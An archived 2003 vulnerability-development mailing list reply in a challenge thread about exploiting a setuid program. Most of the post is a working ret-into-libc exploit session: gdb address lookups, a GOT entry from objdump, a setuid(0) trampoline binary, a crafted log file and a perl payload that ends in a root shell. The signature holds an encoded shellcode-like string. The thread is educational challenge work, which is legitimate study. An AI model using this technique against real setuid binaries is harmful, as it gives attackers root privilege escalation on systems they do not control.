Vulnerability Development mailing list archives
Re: [Vuln-dev Challenge] Challenge #2
From: Jose Ronnick <matrix () phiral com>
Date: Sat, 24 May 2003 18:03:03 -0700
On Sat, 24 May 2003 13:11:13 +0200 spacewalker <spacewalker () 0xbadc0de be> wrote:
0wn3d. Ret into libc exploitation, no setuid() stuff, quite simple in fact. The challenge would have been interesting if the fopen() wasn't "a" but create and write from beginning. $ ./exploit Using system address 0x4005f531 And overwriting printf got at 0x0804971c starting by 0x08049713 sh-2.05b$ exit exit Segmentation fault default offset is 5 (could vary). spacewalker /* Say NO to target[n] exploits ! */
I agree about using ret2libc... this one was easy enough you shouldn't have used shellcode.. =) however... you forget that system() executes through /bin/sh which will drop privs. Try making the vuln program suidroot and then run your exploit... still no root shell. =/ close.. but it really doesn't give you much more since you already had a basic user shell before you executed the sploit.. Here's one way to do it using ret2libc to avoid the privilege dropping.. (same as the encrypted post earlier, plaintext now since the cat's outta the bag anyways).. There's also a way to do with without building a trampoline prog to bounce off of.. just chaining libc calls... If no one else posts a solution doing it, I'll do it an post it later... matrix@overdose vuln-dev $ gcc -o vuln2 vulndev2.c matrix@overdose vuln-dev $ sudo chown root.root vuln2 matrix@overdose vuln-dev $ sudo chmod +s vuln2 matrix@overdose vuln-dev $ echo 'main(){sleep();execl();}' > e.c;gcc -o e.x e.c;gdb -q e.x; rm e.* (gdb) break main Breakpoint 1 at 0x804836e (gdb) run Starting program: /home/matrix/research/vuln-dev/e.x Breakpoint 1, 0x0804836e in main () (gdb) p sleep $1 = {<text variable, no debug info>} 0x400ce760 <sleep> (gdb) p execl $2 = {<text variable, no debug info>} 0x400cecc0 <execl> (gdb) quit The program is running. Exit anyway? (y or n) y matrix@overdose vuln-dev $ objdump -R vuln2 | grep exit 0804974c R_386_JUMP_SLOT exit matrix@overdose vuln-dev $ echo 'main(){setuid(0);setgid(0);execl("/bin/sh","/bin/sh",0);}' > t.c;gcc -o t.ramp t.c; matrix@overdose vuln-dev $ pwd /home/matrix/research/vuln-dev matrix@overdose vuln-dev $ printf "\x60\xe7\x0c\x40/home/matrix/research/vuln-dev/t.ramp\x00" > db.log matrix@overdose vuln-dev $ ./vuln2 `perl -e 'print "\x4c\x97\x04\x08"x31 . "\xc0\xec\x0c\x40" . "\x50\x97\x04\x08"x3;'` h `รง @/home/matrix/research/vuln-dev/t.ramp root@overdose vuln-dev # id uid=0(root) gid=0(root) groups=100(users),10(wheel),18(audio),250(portage) root@overdose vuln-dev # -- %JOSE_RONNICK%50,:-dddd-0EEb-pVVyP\-1111-jjjj-yNNN-_4HUP-qq0q-02%r-_Z%JP-%Iwp-5kyyP-n5nn-aTTa-1271P-4ttt-/888-3tSMP-bbnb-L8wL-kMwgP-3Hy3-rqzWP-m%m8-h4x--v%r5P-S7S7-g7g7-F2u2PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
Attachment:
_bin
Description:
Current thread:
- [Vuln-dev Challenge] Challenge #2 Dave McKinney (May 23)
- Re: [Vuln-dev Challenge] Challenge #2 Thomas Cannon (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 (SPOILER) Joel Eriksson (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 (SPOILER) Joel Eriksson (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Jason_Royes (May 24)
- [Vuln-dev Challenge] nonexec stack&heap solution (encrypted) Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 anon (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 spacewalker (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Jose Ronnick (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 24)
- Re: [Vuln-dev Challenge] Challenge #2 Diode Trnasistor (May 26)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 26)
- Re: [Vuln-dev Challenge] Challenge #2 Robert Hogan (May 30)
- Re: [Vuln-dev Challenge] Challenge #2 Janus N. (May 30)
- Re: [Vuln-dev Challenge] Challenge #2 Diode Trnasistor (May 26)
- Gera's Insecure Programing abo7 sin (May 30)
- <Possible follow-ups>
- Re: [Vuln-dev Challenge] Challenge #2 D. (May 24)
- N00b questions :\ Diode Trnasistor (May 24)
- Re: N00b questions :\ Janus N. (May 24)
- N00b questions :\ Diode Trnasistor (May 24)